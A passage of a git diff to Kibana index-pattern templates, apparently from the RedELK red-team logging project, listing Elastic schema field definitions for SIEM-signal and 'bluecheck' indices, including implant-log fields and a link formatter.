}},{\"count\":0,\"name\":\"source.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"source.user.full_name\"}}},{\"count\":0,\"name\":\"source.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"source.user.name\"}}},{\"count\":0,\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.framework\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"threat.technique.name\"}}},{\"count\":0,\"name\":\"threat.technique.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.cipher\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.certificate\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.certificate_chain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.issuer\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.ja3\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.not_after\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.not_before\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.server_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.subject\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.supported_ciphers\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.curve\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.established\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.next_protocol\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.resumed\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.certificate\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.certificate_chain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.issuer\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.ja3s\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.not_after\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.not_before\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.subject\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.version_protocol\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"trace.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"transaction.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.extension\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.fragment\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"url.full\"}}},{\"count\":0,\"name\":\"url.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.original.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"url.original\"}}},{\"count\":0,\"name\":\"url.password\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.query\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.scheme\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.username\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user.full_name\"}}},{\"count\":0,\"name\":\"user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user.name\"}}},{\"count\":0,\"name\":\"user_agent.device.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.original.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user_agent.original\"}}},{\"count\":0,\"name\":\"user_agent.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user_agent.os.full\"}}},{\"count\":0,\"name\":\"user_agent.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user_agent.os.name\"}}},{\"count\":0,\"name\":\"user_agent.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.classification\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.description.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"vulnerability.description\"}}},{\"count\":0,\"name\":\"vulnerability.enumeration\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.report_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.scanner.vendor\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.base\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.environmental\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.temporal\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.severity\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true}]", "timeFieldName": "@timestamp", "title": ".siem-signals-*"}, "coreMigrationVersion": "7.16.2", "id": "195a3f00-d04f-11ea-9301-a30a04251ae9", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642152853649, 1942], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_bluecheck.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_bluecheck.ndjson index 28c67c82..d4589aba 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_bluecheck.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_bluecheck.ndjson @@ -1 +1 @@ -{"attributes": {"fieldAttrs": "{\"bluecheck.sectools.Product\":{\"count\":1},\"bluechecktype\":{\"count\":1}}", "fields": "[]", "runtimeFieldMap": "{}", "timeFieldName": "@timestamp", "title": "bluecheck-*", "typeMeta": "{}"}, "coreMigrationVersion": "7.16.3", "id": "972368b0-7b90-11ec-9471-7f985bde469d", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1644504089054, 308], "type": "index-pattern", "version": "1"} \ No newline at end of file +{"attributes": {"fieldFormatMap": "{\"implant.log_file\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Implant URL\"}}}", "fields": "[{\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"@version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"@version\"}}},{\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_score\",\"type\":\"number\",\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"bluechecktimestamp\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"bluechecktimestamp.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"bluechecktimestamp\"}}},{\"name\":\"bluechecktype\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"bluechecktype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"bluechecktype\"}}},{\"name\":\"classifier\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"classifier.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"classifier\"}}},{\"name\":\"domain\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"domain.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"domain\"}}},{\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"ecs.version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"ecs.version\"}}},{\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.type\"}}},{\"name\":\"implant.id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"implant.id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"implant.id\"}}},{\"name\":\"implant.log_file\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"implant.log_file.keyword\",\"type\":\"string\",\"esTypes\":[\"key